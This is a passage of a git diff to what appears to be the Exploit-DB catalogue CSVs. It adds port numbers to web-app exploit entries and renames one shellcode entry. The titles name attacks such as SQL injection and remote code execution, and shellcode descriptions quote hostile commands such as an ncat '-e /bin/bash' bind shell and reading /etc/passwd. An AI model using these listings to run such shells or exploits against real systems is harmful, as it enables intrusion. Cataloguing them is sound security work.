 44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
@@ -40010,7 +40010,7 @@ id,file,description,date,author,type,platform,port
 44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
 44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
-44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
+44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
 44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
@@ -40321,7 +40321,7 @@ id,file,description,date,author,type,platform,port
 45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx,
 45707,exploits/php/webapps/45707.txt,"Open Faculty Evaluation System 7 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
 45713,exploits/php/webapps/45713.txt,"Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,
-45717,exploits/php/webapps/45717.txt,"MTGAS MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80
+45717,exploits/php/webapps/45717.txt,"MTGAS MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80
 45718,exploits/php/webapps/45718.txt,"Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery",2018-10-29,"Ihsan Sencan",webapps,php,80
 45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45720,exploits/php/webapps/45720.txt,"Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
@@ -40449,7 +40449,7 @@ id,file,description,date,author,type,platform,port
 45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
 45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
 45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
-45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php,
+45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php,80
 45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
 45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
 45944,exploits/php/webapps/45944.txt,"KeyBase Botnet 1.5 - SQL Injection",2018-12-04,n4pst3r,webapps,php,
@@ -40463,17 +40463,17 @@ id,file,description,date,author,type,platform,port
 45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php,
 45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80
 45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,80
-45963,exploits/php/webapps/45963.txt,"Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery",2018-12-11,"Ihsan Sencan",webapps,php,
-45964,exploits/php/webapps/45964.php,"PrestaShop 1.6.x/1.7.x - Remote Code Execution",2018-12-11,"Fariskhi Vidyan",webapps,php,
-45967,exploits/php/webapps/45967.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-12-11,"Mohammed Abdul Raheem",webapps,php,
+45963,exploits/php/webapps/45963.txt,"Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery",2018-12-11,"Ihsan Sencan",webapps,php,80
+45964,exploits/php/webapps/45964.php,"PrestaShop 1.6.x/1.7.x - Remote Code Execution",2018-12-11,"Fariskhi Vidyan",webapps,php,80
+45967,exploits/php/webapps/45967.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-12-11,"Mohammed Abdul Raheem",webapps,php,80
 45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple,
-45970,exploits/hardware/webapps/45970.txt,"TP-Link wireless router Archer C1200 - Cross-Site Scripting",2018-12-11,"Usman Saeed",webapps,hardware,
-45971,exploits/hardware/webapps/45971.txt,"Huawei B315s-22 - Information Leak",2018-12-11,"Usman Saeed",webapps,hardware,
+45970,exploits/hardware/webapps/45970.txt,"TP-Link wireless router Archer C1200 - Cross-Site Scripting",2018-12-11,"Usman Saeed",webapps,hardware,80
+45971,exploits/hardware/webapps/45971.txt,"Huawei B315s-22 - Information Leak",2018-12-11,"Usman Saeed",webapps,hardware,80
 45972,exploits/hardware/webapps/45972.txt,"ZTE ZXHN H168N - Improper Access Restrictions",2018-12-11,"Usman Saeed",webapps,hardware,
 45973,exploits/aspx/webapps/45973.txt,"Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure",2017-05-05,"Usman Saeed",webapps,aspx,
 45974,exploits/php/webapps/45974.txt,"IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting",2014-02-17,"Usman Saeed",webapps,php,
 45975,exploits/multiple/webapps/45975.txt,"Apache OFBiz 16.11.05 - Cross-Site Scripting",2018-12-11,DKM,webapps,multiple,
-45976,exploits/php/webapps/45976.txt,"HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection",2018-12-11,"Sainadh Jamalpur",webapps,php,
-45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,
-45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,
+45976,exploits/php/webapps/45976.txt,"HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection",2018-12-11,"Sainadh Jamalpur",webapps,php,80
+45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80
+45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80
 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 637de6fdc..60c3ec110 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -925,4 +925,4 @@ id,file,description,date,author,type,platform
 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
 45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
-45980,shellcodes/linux_x86/45980.c,"Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
+45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86